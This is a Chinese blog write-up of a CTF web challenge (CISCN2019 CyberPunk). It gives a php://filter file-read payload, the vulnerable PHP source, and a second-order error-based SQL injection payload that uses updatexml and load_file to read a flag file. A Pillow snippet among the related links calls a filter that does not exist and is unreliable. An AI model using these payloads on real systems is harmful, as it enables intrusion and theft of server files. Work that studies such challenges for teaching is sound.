[CISCN2019 华北赛区 Day1 Web5]CyberPunk

最新推荐文章于 2024-03-20 07:00:00 发布
最新推荐文章于 2024-03-20 07:00:00 发布
阅读量945 收藏
点赞数 1
分类专栏: CTF刷题记录 文章标签: Web CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RABCDXB/article/details/119929199
版权

知识点:二次注入,报错注入

文章目录

解题过程

在这里插入图片描述

在网页源码中,发现题目
在这里插入图片描述
用php伪协议读取文件,?file=php://filter/convert.base64-encode/resource=index.php,可以得到index.php,search.php,delete.php,config.php,confirm.php

其中
index.php对应主页面
confirm.php是录入收货人信息
search.php是查找数据库中的信息
delete.php是删除数据库中的信息
config.php如下

<?php

ini_set("open_basedir", getcwd() . ":/etc:/tmp");

$DATABASE = array(

    "host" => "127.0.0.1",
    "username" => "root",
    "password" => "root",
    "dbname" =>"ctfusers"
);

$db = new mysqli($DATABASE['host'],$DATABASE['username'],$DATABASE['password'],$DATABASE['dbname']);

这几个文件源码都使用了关键词过滤,基本没有注入方法。然后change.php中,只对phoneuser_name进行了过滤,而对address只是使用addslashes()函数,可以使用报错注入。

<?php
//change.php
require_once "config.php";

if(!empty($_POST["user_name"]) && !empty($_POST["address"]) && !empty($_POST["phone"]))
{
    $msg = '';
    $pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
    $user_name = $_POST["user_name"];
    $address = addslashes($_POST["address"]);
    $phone = $_POST["phone"];
    if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){
        $msg = 'no sql inject!';
    }else{
        $sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
        $fetch = $db->query($sql);
    }

    if (isset($fetch) && $fetch->num_rows>0){
        $row = $fetch->fetch_assoc();
        $sql = "update `user` set `address`='".$address."', `old_address`='".$row['address']."' where `user_id`=".$row['user_id'];
        $result = $db->query($sql);
        if(!$result) {
            echo 'error';
            print_r($db->error);
            exit;
        }
        $msg = "订单修改成功";
    } else {
        $msg = "未找到订单!";
    }
}else {
    $msg = "信息不全";
}
?>

二次注入,报错注入

注意sql语句

$sql = "update `user` set `address`='".$address."', `old_address`='".$row['address']."' where `user_id`=".$row['user_id'];

使用updataxml报错注入,updataxml函数对字符串长度有限制,所以分段进行读取

1' where user_id=updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),1,30)),0x7e),1)#

首先提交订单时将可用的sql语句提交
在这里插入图片描述
然后修改订单
在这里插入图片描述因为报错,得到前一部分flag
在这里插入图片描述同理,可得后部分flag

在这里插入图片描述
拼接可得完整的flag

Sk1y
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Cyberpunk_2077:赛博朋克 2077 标志动画与绿袜
05-29
赛博朋克2077 标志动画 :sparkles: Cyber​​punk 2077 是我 2020 年最喜欢的游戏,所以我认为创建它的标志动画会很酷。我在做这个小项目时学到了很多东西,因为我是 Greensock 库的初学者,我也很享受花在这个项目上的每一刻尝试让它变得更好。我仍在做更新以使动画完美并使代码更具可读性。感谢您的阅读 :heart_suit: . 检查下面 codepen 链接中的动画。
cyberpunk-2019:emacs需要的Cyber​​punk主题,但也许不值得。
02-05
cyberpunk-2019:emacs需要的Cyber​​punk主题,但也许不值得。
[CISCN2019 华北赛区 Day1 Web5]CyberPunk --不会编程的崽
最新发布
不会编程的崽的博客
03-20 347
sql盲注,二次注入,sql语句读取文件
Cyberpunk2077_CYBERPUNK_CheatEngine_
09-29
This is the Cyberpunk Cheat table for the Cheat engine
重新记忆Web版:重新:记忆Web
02-06
回复:_记住网络版
cyberpunk-web-page-webm
10-29
cyberpunk-web-page-webm
cyberpunk-iterm:Term iTerm的骇客色彩计划
05-10
赛博朋克iTerm :alien_monster: iTerm骇客Colorscheme 工具在预览中使用: exa , neofetch , httpie和jq 。 ‍安装 转到“个人资料”标签 点击“颜色” 导入cyberpunk.itermcolors 从颜色预设中选择。 :alien_monster: :raising_hands: 学分 向为VS Code创建原始的。 :balance_scale: 执照 :copyright: 。
augmented-ui:赛博朋克风格的Web UI变得容易。 得到增强
04-13
来自PropJockey的增强UI 资源: 主页: : 文件: : 所见即所得Mixin Mixer: : NPM: : GitHub: : 推特: : 旧版v1链接: 主页: : //augmented-ui.com/v1/ 文件: http : //augmented-ui.com/v1/docs/ 测试: http : //augmented-ui.com/v1/test.html unpkg: https ://unpkg.com/augmented-ui@1/augmented.css 安装: $ npm install augmented-ui /node_modules/augmented-ui/augmented-ui.min.css $ npm install augmented-ui然后在使用该文件的任何样式表之前添加/node_
Cyberpunk-GRUB-Theme:[MIRROR]赛博朋克2077启发了GRUBGRUB2主题
05-27
GRUB Bootloader的Cyber​​punk主题 受赛博朋克2077电子游戏启发的GRUB Bootloader主题。 安装 从下载 提取并运行 sudo ./install.sh 注意:经过测试,最好在1920x1080分辨率下观看
[CISCN2019 华北赛区 Day1 Web5]CyberPunk(php://伪协议,报错注入,二次注入)
xlcvv的博客
04-27 391
进到页面: (说到赛博朋克,tM居然跳票了,令人烦躁) 老规矩F12: 有个hint,见到file就想到了熟悉的php://伪协议,payload: /index.php?file=php://filter/convert.base64-encode/resource=index.php 返回一大串base64编码内容,解码一下: <?php //index.php ini_set('...
[CISCN2019 华北赛区 Day1 Web5]CyberPunk题解
lonmar的博客
02-02 879
前言 考察二次注入 有关这方面总结: 网鼎杯2018-commit题解&二次注入&addslashes安全问题&insert注入 题解 根据提示,读取代码 然后把代码都读出来,进行审计.在change.php,发现了address仅用addslashes进行处理,而且插入数据库中的address会在下次查询中插入到新的dal语句中,存在二次注入 然后尝试下MySQL insert语句特性 所以可以尝试构造payload: address=’,`address`=(sql语句.
NO.3-12 [CISCN2019 华北赛区 Day1 Web5]CyberPunk
nigo134的博客
08-07 177
解题过程 首先进入题目页面 看起来没有什么特别的,就是一个可以提交信息的页面。查看响应报文也没有什么提示,但是在网页注释里有东西。 <!--?file=?--> 这里可能有一个文件包含,尝试payload http://xxx.xxx/index.php?file=php://filter/convert.base64-encode/resource=index.php 结果得到了当前页面经过加密后的源码 有关伪协议的内容,可以大致参考下这篇文章:https://
[CISCN2019 华北赛区 Day1 Web5]CyberPunk 二次报错注入
m0_64180167的博客
10-08 7085
buu上 做点首先就是打开环境 开始信息收集发现源代码中存在?file提示我们多半是包含我原本去试了试 ../../etc/passwd失败了 直接伪协议上吧我们通过伪协议全部读取我们提取关键信息。
用python的pillow写一个程序,将一个城市图片赛博朋克化
05-11
好的,以下是一个简单的Python程序,使用Pillow库将城市图片赛博朋克化: ```python from PIL import Image, ImageFilter, ImageOps # 打开原始图片 original_image = Image.open('city.jpg') # 转换为黑白图片 black_white_image = original_image.convert('L') # 添加噪点 noisy_image = black_white_image.filter(ImageFilter.GaussianBlur(radius=2)) noisy_image = noisy_image.filter(ImageFilter.AddNoise(0.3)) # 反转图片 inverted_image = ImageOps.invert(noisy_image) # 应用赛博朋克效果 cyberpunk_image = inverted_image.filter(ImageFilter.SMOOTH_MORE) cyberpunk_image = cyberpunk_image.filter(ImageFilter.CONTOUR) # 保存处理后的图片 cyberpunk_image.save('cyberpunk_city.jpg') ``` 这个程序将原始城市图片转换为黑白,添加噪点,反转颜色,最后应用赛博朋克效果。最终的赛博朋克化图片将保存为 `cyberpunk_city.jpg` 文件。你可以根据自己的需要调整处理效果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值